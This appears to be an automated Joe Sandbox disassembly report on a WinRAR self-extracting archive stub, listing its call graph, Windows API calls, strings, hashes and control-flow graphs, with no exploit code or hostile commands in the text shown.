40daa8 19534->19535 19535->19533 19536 40dabd GetClassNameW 19535->19536 19538 40dae5 GetWindowLongW 19535->19538 19539 40db46 GetWindow 19535->19539 21376 411bd1 CompareStringW 19536->21376 19538->19539 19540 40daf5 SendMessageW 19538->19540 19539->19533 19539->19535 19540->19539 19541 40db07 GetObjectW 19540->19541 21377 419b88 19541->21377 19543 40db1c 21381 419b45 19543->21381 21385 419c15 19543->21385 19547 40db3f DeleteObject 19547->19539 19548->19314 19550 419a48 19549->19550 19555 419a6d 19549->19555 21402 411bd1 CompareStringW 19550->21402 19551 419a72 SHAutoComplete 19552 40fabb 19551->19552 19557 40e608 19552->19557 19554 419a5b 19554->19555 19556 419a5f FindWindowExW 19554->19556 19555->19551 19555->19552 19556->19555 19558 40e612 __EH_prolog __write_nolock 19557->19558 19559 40184a 133 API calls 19558->19559 19560 40e634 19559->19560 21403 401a42 19560->21403 19565 40e6ad 19568 401228 ctype 131 API calls 19565->19568 19566 41ccee _malloc 67 API calls 19569 40e67a _realloc 19566->19569 19567 41a27a _realloc 67 API calls 19567->19565 19570 40e6bc 19568->19570 19569->19565 19569->19567 19570->19338 19570->19343 19572 4050fb SHBrowseForFolderW 19571->19572 19573 4050f7 19571->19573 19572->19573 19574 405138 SHGetPathFromIDListW 19572->19574 19573->19295 19573->19326 19574->19573 19577 40d949 __write_nolock 19575->19577 19576 40d9c1 19576->19339 19577->19576 19578 40d96e RegCreateKeyExW 19577->19578 19578->19576 19579 40d994 _wcslen 19578->19579 19580 40d99c RegSetValueExW RegCloseKey 19579->19580 19580->19576 19582 40ceb5 19581->19582 19583 40cece 19581->19583 19584 40ce6b 124 API calls 19582->19584 19583->19406 19584->19583 19586 40d0f8 19585->19586 19586->19426 19587->19448 21451 4197ab LoadCursorW RegisterClassExW 19588->21451 19590 41983c GetWindowRect GetParent MapWindowPoints 19591 419872 DestroyWindow 19590->19591 19592 419879 GetParent CreateWindowExW 19590->19592 19591->19592 19593 4198fb 19592->19593 19595 4198be 19592->19595 19594 4198ff 
ShowWindow UpdateWindow 19593->19594 19596 419911 19593->19596 19594->19596 19602 40fb64 19595->19602 21452 4191f2 19595->21452 19596->19602 21458 419045 GetTickCount GetTickCount 19596->21458 19600 4198dd ShowWindow SetWindowTextW 19601 41a27a _realloc 67 API calls 19600->19601 19601->19602 19602->19390 19603->19377 19604->19365 19628 40bf27 19605->19628 19607 40c02d GetWindowRect GetClientRect 19608 40c10a 19607->19608 19612 40c071 19607->19612 19610 40c153 GetSystemMetrics GetWindow 19608->19610 19611 40c115 GetWindowTextW 19608->19611 19609 40c14e 19609->19610 19620 40c177 19610->19620 19631 40bdcf 19611->19631 19612->19609 19614 40c0c4 GetWindowLongW 19612->19614 19618 40c0e4 SetWindowPos GetWindowRect 19614->19618 19619 40c0dd 19614->19619 19615 40c253 19615->19454 19616 40c13c SetWindowTextW 19616->19610 19617 40c184 GetWindowTextW 19617->19620 19618->19608 19619->19618 19620->19615 19620->19617 19621 40bdcf ctype 102 API calls 19620->19621 19622 40c235 GetWindow 19620->19622 19623 40c1cb GetWindowRect SetWindowPos 19620->19623 19624 40c1b5 SetWindowTextW 19621->19624 19622->19615 19622->19620 19623->19622 19624->19620 19626 40bae1 19625->19626 19627 40bac3 GetWindowLongW SetWindowLongW 19625->19627 19626->19454 19627->19626 19629 40bdcf ctype 102 API calls 19628->19629 19630 40bf4e _wcschr 19629->19630 19630->19607 19632 40bddc ctype __write_nolock 19631->19632 19633 40be37 ctype _strlen 19632->19633 19638 40be96 _wcsrchr _wcscpy _wcschr ctype _wcsncpy 19632->19638 19639 41186e WideCharToMultiByte 19632->19639 19634 41186e ctype WideCharToMultiByte 19633->19634 19636 40be64 ctype _strlen 19634->19636 19637 401b74 _swprintf 101 API calls 19636->19637 19637->19638 19638->19616 19640 411898 19639->19640 19640->19633 19642 40d183 ShowWindow SendMessageW SendMessageW 19641->19642 19643 418f0a DestroyWindow 19641->19643 19642->19458 19643->19642 19645 4091f6 __write_nolock 19644->19645 19646 40921f 19645->19646 19647 409216 CreateDirectoryW 19645->19647 19657 
4091c5 19646->19657 19647->19646 19650 40924e 19647->19650 19654 40925d 19650->19654 19670 408fad 19650->19670 19651 409261 GetLastError 19651->19654 19654->19467 19655 40923b 19655->19651 19656 40923f CreateDirectoryW 19655->19656 19656->19650 19656->19651 19678 408f61 19657->19678 19660 40a77b 19661 40a788 __write_nolock 19660->19661 19669 40a792 _wcslen _wcscpy _wcsncpy 19661->19669 19688 40a1e9 19661->19688 19663 40a7a1 _wcslen 19691 40a690 19663->19691 19665 40a7b0 19666 40a843 GetCurrentDirectoryW 19665->19666 19667 40a7b8 19665->19667 19666->19669 19668 40a1e9 CharUpperW 19667->19668 19668->19669 19669->19655 19671 41a860 __write_nolock 19670->19671 19672 408fba SetFileAttributesW 19671->19672 19673 408fd3 19672->19673 19674 408ffc 19672->19674 19675 40a77b 2 API calls 19673->19675 19674->19654 19676 408fe7 19675->19676 19676->19674 19677 408feb SetFileAttributesW 19676->19677 19677->19674 19686 41a860 19678->19686 19681 408f82 19683 40a77b 2 API calls 19681->19683 19682 408fa5 19682->19651 19682->19660 19684 408f96 19683->19684 19684->19682 19685 408f9a GetFileAttributesW 19684->19685 19685->19682 19687 408f6e GetFileAttributesW 19686->19687 19687->19681 19687->19682 19695 410907 19688->19695 19692 40a69b 19691->19692 19693 40a1e9 CharUpperW 19692->19693 19694 40a6a8 19692->19694 19693->19694 19694->19665 19696 410914 CharUpperW 19695->19696 19697 40a1f7 19695->19697 19696->19697 19697->19663 19699 40d63e __write_nolock 19698->19699 19700 40d6f5 19699->19700 19701 40d6d2 ExpandEnvironmentStringsW 19699->19701 19700->19503 19701->19700 19702->19503 19705 40d9d3 __write_nolock 19703->19705 19704 40da6d GetDlgItem SetWindowTextW SendMessageW 19704->19503 19705->19704 19706 40d9ef RegOpenKeyExW 19705->19706 19706->19704 19707 40da0c RegQueryValueExW 19706->19707 19708 40da64 RegCloseKey 19707->19708 19709 40da38 19707->19709 19708->19704 19709->19708 19710->19503 19713 40953f 19711->19713 19712 409396 7 API calls 19712->19713 19713->19712 19714 4095cf 
19713->19714 19714->19503 19716 40a1e9 CharUpperW 19715->19716 19717 40a701 19716->19717 19718 401b74 _swprintf 101 API calls 19717->19718 19719 40a718 _wcslen _wcschr _wcsncpy 19717->19719 19718->19719 19719->19510 19721 409374 FindClose 19720->19721 19722 40937b 19720->19722 19721->19722 19722->19503 19724 40d7ea __write_nolock 19723->19724 19725 41ccee _malloc 67 API calls 19724->19725 19726 40d7f6 19725->19726 19730 40d807 _wcscat _wcslen _wcscpy 19726->19730 19731 406358 19726->19731 19728 40d631 ExpandEnvironmentStringsW 19728->19730 19729 40d8a7 19729->19503 19730->19728 19730->19729 19736 40633e 19731->19736 19733 406360 19739 4062f5 19733->19739 19743 401ba7 19736->19743 19738 406348 19738->19733 19741 406304 19739->19741 19740 406321 19740->19730 19741->19740 19742 41c52f __CxxThrowException@8 RaiseException 19741->19742 19742->19740 19744 41147f ctype 119 API calls 19743->19744 19745 401bc3 19744->19745 19745->19738 19747 410acd _wcslen 19746->19747 19775 4011a7 19747->19775 19749 410ae5 _wcscpy 19749->19520 19751 410ac0 _wcslen 19750->19751 19752 4011a7 125 API calls 19751->19752 19753 410ae5 _wcscpy 19752->19753 19753->19522 19755 4070a0 __EH_prolog 19754->19755 19785 41a60a 19755->19785 19759 4070f7 19760 4082e0 19759->19760 19761 4082ed __write_nolock 19760->19761 19762 408354 19761->19762 19884 4095dc 19761->19884 19766 4083b9 19762->19766 19767 4095dc 8 API calls 19762->19767 19861 40812b 19762->19861 19764 4083fd 19764->19526 19766->19764 19768 4012d0 ctype 119 API calls 19766->19768 19767->19762 19768->19764 19770 406fc4 __EH_prolog 19769->19770 19771 406fe1 ctype 19770->19771 19773 415380 131 API calls 19770->19773 19772 401001 ctype 131 API calls 19771->19772 19774 406ff4 19772->19774 19773->19771 19774->19444 19776 401211 19775->19776 19777 4011b9 19775->19777 19776->19749 19778 4011e2 19777->19778 19780 4063ad ctype 119 API calls 19777->19780 19779 41a308 _realloc 72 API calls 19778->19779 19783 401202 19779->19783 19781 4011d8 19780->19781 

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00410BE8: GetModuleHandleW.KERNEL32(kernel32,0040FD0B,00000001), ref: 00410BED
                                                                                    • Part of subcall function 00410BE8: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00410BFD
                                                                                  • OleInitialize.OLE32(00000000), ref: 0040FD0E
                                                                                    • Part of subcall function 00411CC7: GetCPInfo.KERNEL32(00000000,?,?,?,?,0040FD1E), ref: 00411CD8
                                                                                    • Part of subcall function 00411CC7: IsDBCSLeadByte.KERNEL32(00000000), ref: 00411CEC
                                                                                  • _memset.LIBCMT ref: 0040FD2A
                                                                                  • GetCommandLineW.KERNEL32 ref: 0040FD32
                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0040FD58
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007002), ref: 0040FD6A
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0040FD93
                                                                                    • Part of subcall function 0040D4A7: SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 0040D4C0
                                                                                    • Part of subcall function 0040D4A7: SetEnvironmentVariableW.KERNEL32(sfxpar,00000002,00000000,00000000,?,?,00000400), ref: 0040D4F3
                                                                                  • CloseHandle.KERNEL32(?), ref: 0040FD9C
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00438820,00000800), ref: 0040FDB6
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,00438820), ref: 0040FDC2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040FDC9
                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0040FDE0
                                                                                  • LoadBitmapW.USER32(00000065), ref: 0040FDF3
                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,0040F436,00000000), ref: 0040FE52
                                                                                  • DeleteObject.GDI32 ref: 0040FEB3
                                                                                  • DeleteObject.GDI32(?), ref: 0040FEBF
                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040FEFC
                                                                                  • Sleep.KERNEL32(?), ref: 0040FF0C
                                                                                  • OleUninitialize.OLE32 ref: 0040FF12
                                                                                    • Part of subcall function 0040D4FB: CharUpperW.USER32(?,?,?,?,00000400), ref: 0040D55C
                                                                                    • Part of subcall function 0040D4FB: CharUpperW.USER32(?,?,?,?,?,00000400), ref: 0040D583
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileHandle$EnvironmentModuleVariable$CharCloseDeleteLoadObjectUpperView$AddressBitmapByteCommandDialogIconInfoInitializeLeadLineMappingNameOpenParamProcSleepUninitializeUnmap_memset
                                                                                  • String ID: STARTDLG$sfxname$winrarsfxmappingfile.tmp
                                                                                  • API String ID: 3055076122-2503671248
                                                                                  • Opcode ID: a22acdb766a7c0e52184bb8b612a7c1dc45bd1962d25c885258a70212aff553f
                                                                                  • Instruction ID: f4f22b9ba360d764c944beb667196f2bea3764b9e46d0abae360175085c82a8e
                                                                                  • Opcode Fuzzy Hash: a22acdb766a7c0e52184bb8b612a7c1dc45bd1962d25c885258a70212aff553f
                                                                                  • Instruction Fuzzy Hash: 4C51A570A00204EFC724BFB1ED8A96E7AA9EB45314B50443FF505A32A1DB7C4955CBAD
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 00401D06
                                                                                  • _strlen.LIBCMT ref: 00402277
                                                                                    • Part of subcall function 004118AD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,00001FFF,?,?,004022FC,00000000,?,00000800,?,00001FFF,?), ref: 004118C9
                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004023D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharH_prologMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                                                  • String ID: CMT
                                                                                  • API String ID: 1706572503-2756464174
                                                                                  • Opcode ID: aa2f60ddcec8fd2efd3fda57f68e11ada5fb96b913be5de19f4ea4d0439c56d0
                                                                                  • Instruction ID: 9442b8194121d703088a8fabf333f0c3befbc1c42b6ea704bbd0c6a07644fbaa
                                                                                  • Opcode Fuzzy Hash: aa2f60ddcec8fd2efd3fda57f68e11ada5fb96b913be5de19f4ea4d0439c56d0
                                                                                  • Instruction Fuzzy Hash: 406211709006848FCF15DF64C899BEE7BB1AF14304F08447FE986AB2C6DB785985CB68

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,00000800,?,?,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 004093C4
                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,00000800,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 004093F4
                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 004093FE
                                                                                  • FindNextFileW.KERNEL32(000000FF,?,00000800,?,?,?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000), ref: 00409428
                                                                                  • GetLastError.KERNEL32(?,00409605,000000FF,?,?,?,?,00408331,?,?,00000000,?,00000800), ref: 00409436
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast$Next
                                                                                  • String ID:
                                                                                  • API String ID: 869497890-0
                                                                                  • Opcode ID: 5046d3256f54a4eb14f67afb25d84d6bd2b79aa0e406bc94fe027f4d8763a26c
                                                                                  • Instruction ID: 3bd6e1595cc40084cd7e2c41453e8846b53c8c10c675e8f8304b93ed0838cd52
                                                                                  • Opcode Fuzzy Hash: 5046d3256f54a4eb14f67afb25d84d6bd2b79aa0e406bc94fe027f4d8763a26c
                                                                                  • Instruction Fuzzy Hash: B7416F719006549BCB20DF28CC84ADA77F8BF48350F10466AF56EE2291D774AAC5CF54
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memset
                                                                                  • String ID:
                                                                                  • API String ID: 2102423945-0
                                                                                  • Opcode ID: 7889950b6ae447eba384dc39c4309f2808af0eef35d2d8dcdc64f6cf0a8ad92c
                                                                                  • Instruction ID: 32ee2a2af2c0316917a2b5ad144b093d5dc149cfb96975b6bee9dbb568e54f8d
                                                                                  • Opcode Fuzzy Hash: 7889950b6ae447eba384dc39c4309f2808af0eef35d2d8dcdc64f6cf0a8ad92c
                                                                                  • Instruction Fuzzy Hash: 7A92E3709087859FCB29CF34C4C06E9BBF1AF55308F18C5AED8968B342D739A985CB59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 0 40f436-40f469 call 41a250 call 41a860 call 4060e6 7 40f473-40f47c 0->7 8 40f46b-40f46e 0->8 10 40f482-40f483 7->10 11 40fa19-40fa2c 7->11 9 40fceb-40fcf8 8->9 12 40f494-40f496 10->12 13 40f485-40f48a 10->13 14 40fa3d-40fa44 11->14 15 40fa2e-40fa37 SendMessageW 11->15 18 40fcea 12->18 16 40f4f1-40f50d GetDlgItemTextW 13->16 17 40f48c-40f48d 13->17 19 40fa56-40faa1 call 40da71 GetDlgItem SendMessageW call 419a10 GetDlgItem 14->19 20 40fa46-40fa50 SendDlgItemMessageW 14->20 15->14 22 40f525-40f52b 16->22 23 40f50f-40f515 16->23 24 40f4cd-40f4da 17->24 25 40f48f-40f492 17->25 18->9 53 40faa3 19->53 54 40faa9-40fadc SetWindowTextW call 419a27 call 40e608 19->54 20->19 31 40f53c-40f54e GetDlgItem 22->31 32 40f52d-40f537 22->32 29 40f517 23->29 30 40f51e-40f520 23->30 27 40f4e0-40f4e6 24->27 28 40f8c7 24->28 25->12 33 40f49b-40f4b2 call 40c271 call 4050e0 25->33 36 40f4ec 27->36 37 40f8cf-40f8d2 27->37 35 40f8c8-40f8c9 EndDialog 28->35 29->30 30->35 39 40f550-40f571 SendMessageW * 2 31->39 40 40f576-40f585 SetFocus 31->40 38 40f9a4-40f9aa 32->38 33->37 61 40f4b8-40f4c8 SetDlgItemTextW 33->61 35->37 36->28 37->18 42 40f9b0-40f9b6 38->42 43 40fbb2-40fbba KiUserCallbackDispatcher 38->43 39->40 45 40f593-40f5da call 410951 call 40dc2e call 40c271 call 401b74 40->45 46 40f587-40f591 call 40c271 40->46 42->43 50 40f9bc-40f9de call 40c271 SetDlgItemTextW 42->50 52 40fce8 43->52 60 40f5e0-40f5ed call 40d148 45->60 46->60 65 40f9e0-40f9e5 50->65 66 40f9e7-40f9f3 50->66 52->18 53->54 76 40faec-40faf2 54->76 77 40fade-40fae7 call 40e700 54->77 78 40f5fb-40f60d call 40927f 60->78 79 40f5ef-40f5f6 call 40d93c 60->79 61->37 70 40f9f9-40fa14 call 40c271 * 2 MessageBoxW 65->70 66->70 70->52 84 40fb20-40fb22 76->84 85 40faf4-40fb1e call 40c271 SetDlgItemTextW call 40c271 SetDlgItemTextW 76->85 77->76 93 40f623-40f634 call 4199fd 78->93 94 40f60f-40f618 GetLastError 78->94 79->78 88 
40fb23-40fb29 84->88 85->88 95 40fbcc-40fbd2 88->95 96 40fb2f-40fb37 call 40e700 88->96 113 40f645-40f64b 93->113 114 40f636-40f63f GetLastError 93->114 99 40f61a-40f61d 94->99 100 40f61f 94->100 103 40fc75-40fc7c 95->103 104 40fbd8-40fbde 95->104 106 40fb3c-40fb43 96->106 99->93 99->100 100->93 109 40fc88-40fc8e 103->109 110 40fc7e-40fc82 EnableWindow 103->110 104->103 108 40fbe4-40fbea 104->108 111 40fb70-40fb76 106->111 112 40fb45-40fb4b 106->112 108->103 115 40fbf0-40fbfe 108->115 116 40fc90-40fc9d call 4060a3 * 2 109->116 117 40fca2-40fca9 109->117 110->109 126 40fb78-40fb85 SetForegroundWindow 111->126 127 40fbbf-40fbc7 call 40e700 111->127 112->111 120 40fb4d-40fb6f call 419812 call 41a27a 112->120 123 40f6b5-40f6b8 113->123 124 40f64d-40f650 113->124 114->113 121 40f641 114->121 122 40fc01-40fc04 115->122 116->117 118 40fcab-40fcb1 117->118 119 40fccd-40fcd3 117->119 118->119 129 40fcb3-40fcbd 118->129 119->52 131 40fcd5-40fce2 call 40c271 SetDlgItemTextW 119->131 120->111 121->113 135 40fc06-40fc0c 122->135 136 40fc0e-40fc15 122->136 132 40f8d7-40f91f call 4060c1 * 2 call 4060a3 call 4060c1 SetDlgItemTextW GetDlgItem 123->132 133 40f6be-40f6c4 123->133 137 40f652-40f68b GetTickCount call 401b74 call 4086a6 call 408843 124->137 138 40f6c9-40f6d3 124->138 126->127 128 40fb87-40fb8d 126->128 127->95 128->127 140 40fb8f-40fba9 DialogBoxParamW 128->140 141 40fcc7 PostMessageW 129->141 142 40fcbf-40fcc5 SendMessageW 129->142 131->52 205 40f921-40f935 GetWindowLongW SetWindowLongW 132->205 206 40f93b-40f976 call 40e700 * 2 call 40e187 call 40e700 132->206 133->138 145 40f6c6 133->145 135->136 147 40fc49-40fc53 135->147 150 40fc17-40fc1d 136->150 151 40fc1f-40fc48 call 41a53d call 40c271 call 41a53d 136->151 185 40f690-40f695 137->185 148 40f6d9-40f788 GetModuleFileNameW call 40ceac call 401b74 CreateFileMappingW 138->148 149 40f86f-40f8c1 call 40c271 call 401b74 call 4062b2 call 40c271 MessageBoxW 138->149 140->127 158 40fbab 140->158 141->119 142->119 145->138 
147->122 154 40fc55-40fc74 call 419812 147->154 181 40f78a-40f798 GetCommandLineW 148->181 182 40f7ee-40f81e ShellExecuteExW call 40ce55 * 2 148->182 149->28 150->147 150->151 151->147 154->103 158->43 188 40f7aa-40f7eb call 40d0c2 * 3 MapViewOfFile call 41c000 181->188 189 40f79a-40f7a5 call 410951 181->189 210 40f820-40f82e WaitForInputIdle 182->210 211 40f84f 182->211 191 40f6a6-40f6b0 call 408b9d 185->191 192 40f697-40f6a0 GetLastError 185->192 188->182 189->188 191->123 192->191 200 40f6a2 192->200 200->191 205->206 230 40f996-40f99e call 4060a3 206->230 231 40f978-40f97e 206->231 215 40f830-40f835 210->215 217 40f853-40f856 211->217 218 40f845-40f84d 215->218 219 40f837-40f843 Sleep 215->219 221 40f858-40f864 UnmapViewOfFile CloseHandle 217->221 222 40f86a-40f86d 217->222 218->217 219->215 219->218 221->222 222->28 222->149 230->38 231->230 232 40f980-40f986 231->232 232->230 234 40f988-40f991 call 40e700 232->234 234->230
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1669386621.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1669370815.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669472015.000000000042A000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000042F000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669494281.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1669884926.0000000000451000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_Ekpb7jn7mf.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID: "%s"%s$-el -s2 "-d%s" "-p%s" "-sp%s"$<$@$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp$z(D
                                                                                  • API String ID: 3519838083-1299667913
                                                                                  • Opcode ID: 4136df6a6fdd2908081ecb667f8b38cd016a064ae2cbabecf8b175fe67b05172
                                                                                  • Instruction ID: 2de117cf305f029db3da918c16ce27e436648ede792bd40733fb280a025eb681
                                                                                  • Opcode Fuzzy Hash: 4136df6a6fdd2908081ecb667f8b38cd016a064ae2cbabecf8b175fe67b05172
                                                                                  • Instruction Fuzzy Hash: 6722F471540244BFEB31BFA19D85E9E3A68AB02304F40417BFA05B21E1D77D4969CB6E

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 237 40e700-40e718 call 41a250 call 41a860 242 40f2dd-40f2e8 237->242 243 40e71e-40e744 call 40d631 237->243 243->242 246 40e74a-40e74d 243->246 247 40e752-40e76c 246->247 248 40e773-40e786 call 40db68 247->248 251 40e788 248->251 252 40e78c-40e7a4 call 411bd1 251->252 255 40e7b4-40e7b8 252->255 256 40e7a6-40e7ad 252->256 258 40f2ae-40f2d4 call 40d631 255->258 259 40e7be-40e7c1 255->259 256->252 257 40e7af 256->257 257->258 258->247 270 40f2da-40f2dc 258->270 261 40ea70-40ea74 259->261 262 40ea51-40ea55 259->262 263 40e7c8-40e7cc 259->263 264 40e9af-40e9b3 259->264 261->258 267 40ea7a-40ea82 261->267 262->258 265 40ea5b-40ea6b SetWindowTextW 262->265 263->258 268 40e7d2-40e83c call 419a10 call 40a03a call 409353 call 40937c call 40676b call 40952e 263->268 264->258 269 40e9b9-40e9c8 264->269 265->258 267->258 271 40ea88-40eaa2 267->271 336 40e842 268->336 337 40e99b-40e9aa call 409369 268->337 273 40e9d7-40e9db 269->273 274 40e9ca-40e9d6 call 41a53d 269->274 270->242 277 40eaa4-40eaaa 271->277 278 40eaad-40eab6 call 41a523 271->278 275 40e9e5-40e9ed call 40d7dd 273->275 276 40e9dd-40e9e3 273->276 274->273 281 40e9ef-40e9f3 275->281 276->281 277->278 278->258 293 40eabc-40eac3 278->293 287 40e9f5-40e9f7 281->287 288 40e9f9-40ea05 call 41a523 281->288 291 40ea07-40ea2b call 41a523 call 41a308 287->291 288->291 322 40ea32-40ea3f call 41a53d 291->322 323 40ea2d-40ea2f 291->323 298 40eac5-40eaca 293->298 299 40eadf-40eae3 293->299 298->299 300 40eacc-40ead3 298->300 302 40ebc4 299->302 303 40eae9-40eaec 299->303 300->258 305 40ead9-40eada 300->305 309 40ebc5-40ebcc call 41a56b 302->309 307 40eaf9-40eb13 RegOpenKeyExW 303->307 308 40eaee-40eaf3 303->308 305->309 312 40eb15-40eb4f RegQueryValueExW RegCloseKey 307->312 313 40eb5e-40eb66 307->313 308->302 308->307 321 40ebd1-40ebd2 309->321 317 40eb51 312->317 318 40eb54-40eb56 312->318 319 40eb93-40ebb1 call 41a523 * 2 
313->319 320 40eb68-40eb7e call 41a523 313->320 317->318 318->313 328 40ebd3-40ebe5 call 41c7ff 319->328 350 40ebb3-40ebc2 call 41a53d 319->350 320->319 338 40eb80-40eb92 call 41a53d 320->338 321->328 322->258 334 40ea45-40ea4c call 41a27a 322->334 323->322 345 40ebf3-40ec41 call 41a56b call 40d9c6 GetDlgItem SetWindowTextW SendMessageW call 41a791 328->345 346 40ebe7-40ebec 328->346 334->258 342 40e847-40e85d SetFileAttributesW 336->342 337->258 338->319 351 40e863-40e897 call 40a6ec call 40a00a call 41a523 342->351 352 40e905-40e911 GetFileAttributesW 342->352 373 40ec46-40ec4a 345->373 346->345 347 40ebee-40ebf0 346->347 347->345 350->321 379 40e899-40e8a9 call 41a523 351->379 380 40e8ab-40e8b9 call 409fc4 351->380 358 40e913-40e922 DeleteFileW 352->358 359 40e97f-40e995 call 40952e 352->359 358->359 364 40e924-40e928 358->364 359->337 359->342 368 40e930-40e954 call 401b74 GetFileAttributesW 364->368 375 40e956-40e96c MoveFileW 368->375 376 40e92a-40e92d 368->376 373->258 377 40ec50-40ec65 SendMessageW 373->377 375->359 381 40e96e-40e979 MoveFileExW 375->381 376->368 377->258 379->380 386 40e8bf-40e8ff call 41a523 call 41a590 SHFileOperationW 379->386 380->337 380->386 381->359 386->352
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0040E705
